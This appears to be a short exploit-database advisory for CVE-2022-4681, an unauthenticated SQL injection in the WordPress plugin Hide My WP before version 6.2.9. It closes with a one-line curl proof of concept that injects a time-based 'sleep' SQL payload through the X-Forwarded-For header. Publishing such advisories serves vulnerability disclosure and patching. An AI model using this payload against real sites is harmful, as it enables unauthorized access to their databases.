# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11 # Original Researcher: Xenofon Vassilakopoulos # Exploit Author: Xenofon Vassilakopoulos # Submitter: Xenofon Vassilakopoulos # Vendor Homepage: https://wpwave.com/ # Version: Hide My WP v6.2.8 and prior # Tested on: Hide My WP v6.2.7 # Impact: Database Access # CVE: CVE-2022-4681 # CWE: CWE-89 # CVSS Score: 8.6 (high) ## Description The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. ## Proof of Concept curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"